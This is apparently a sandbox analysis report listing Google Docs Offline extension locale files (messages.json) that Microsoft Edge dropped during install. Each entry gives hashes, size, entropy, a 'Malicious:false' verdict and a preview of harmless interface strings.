                                                                                                                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                      MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                      SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                      SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                      SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):959
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                      MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                      SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                      SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                      SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                      MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                      SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                      SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                      SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                      MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                      SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                      SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                      SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                      MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                      SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                      SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                      SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):911
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                      MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                      SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                      SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                      SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):939
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                      MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                      SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                      SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                      SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
